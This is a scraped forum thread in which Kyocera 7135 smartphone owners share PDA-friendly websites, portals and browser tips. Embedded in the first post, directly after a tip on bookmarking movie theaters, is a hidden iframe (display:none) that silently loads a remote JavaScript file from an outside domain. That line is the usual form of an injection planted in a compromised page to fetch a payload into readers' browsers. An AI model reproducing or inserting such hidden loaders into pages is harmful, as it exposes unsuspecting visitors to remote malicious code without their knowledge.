7135 Good Websites to access

Please post here any good websites to access with the 7135? I have found that some sites work better than others due to layout and advertising and all. If anyone knows of usefull websites that display well on the 7135, please post them here.

For example:

I found that you can Bookmark your movie theaters by going to Quicklinks in the EIS Application, choosing entertainment, moviephone, entering your zip code, and then choosing a theater. Save this bookmark (as the theater name), and you can get directly to the movies with one click in the future! (well, maybe two clicks. After choosing the bookmark in the future, you need to click refresh also, otherwise it appearently loads from memory and the old date).<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Fast loading, CNN mostly text page:

http://wireless.cnn.com/pqa/cnn/en/index.html

Local weather with radar and satellite maps sized for PALM display

http://www.accuweather.com/pda/pda_5dy.asp

(note: the maps display much better on Blazer then on EIS, but Blazer will hold page's in the cache, so you always need to refresh to get the latest)

Yahoo Gateway/Portal

Search Engine

Send a message via Yahoo to jrosaly

by the way how the heck do you refresh in Blazer, without having to clear the cache? it's not in the menus, and I haven't heard of a shortcut.

Great websites for the 7135?

Now that we have the phone, what are some good sites to surf on??

Specifically, on the Eudora web app.

I have tried a few and can't find any good news sites, sports, entertainment and whatnot??

Am I using the wrong browser? I really don't want to pay for one..

Here is the discussion on the best browsers:

http://www.smartphonesource.com/vbul...&threadid=4791

here is a user poll with some discussion of the best browsers:

http://www.smartphonesource.com/vbul...&threadid=5276

Here is a thread on the best wireless stuff. Includes both applicatoins and sites:

http://www.smartphonesource.com/vbul...&threadid=3947

This site's search engine is your friend (although I will admit that the last one was a little tricky to find. I knew it was there, so I knew which keywords to use, and it died off pretty quick because most of the "best wireless stuff" thread covered the same topic).

Best wireless palm web sites

I searched this site and the web and it seems to be somewhat difficult to find recommedations for good palm friendly web sites. I saw one for accuweather in one of the threads -- That great. Could anyone who knows of good sites or portals please post the URLs here. Also, I went to mobile.yahoo.com and it seems to be geared toward wap -- Is this true or am I looking at the wrong spot?

FYI... I figured out the the URL to get at Yahoo via palm. Its http://mobile.yahoo.com/home. It seems like you can't get at a lot of the yahoo content. (I.e. calendar, yellow pages, etc.) It also prompts me for my zip code all the time for weather, movies, etc. This is even after I sign-in. Even if they didn't link it to my sign-in you'd think they would put it in a cookie.

Yeah Yahoo really sucks in this regard. I switched to Yahoo a while ago because I thought I would be able to synchronize my "My Yahoo" start up page preferences with my mobile ones. Apparently it doesn't work like this. So if anyone has a better solution to get custom News, Stock Quotes, Sports News, etc. and Favorite Links (important, especially mobile sites) synched between desktop and phone, please post it!

Newbie to PDA's

Well, this is my first PDA and I'm loving it. This forum is very informational. I'm curious to know if there are any PDA friendly websites that I can view with my 7135? Meaning somthing not too graphic so that I can view a website quickly.

A few of us have made "Wireless Portals," which really consist of a single web page with links to other web pages that tend to look good with the various 7135 browsers.

I have one that is available to everyone over at:

http://www.warrenernst.com/mobile/

I'm sure other's will add theirs to the list too.

best/most useful pda websites?

New to pda surfing. So far I've found Yahoo!, 555-1212, mapquest, and a few useful Avantgo stuff. All quite well know.

But, what other cool/ useful sites are there out there I ought to check out on my PDA.

Plus... stupid pda web tricks?
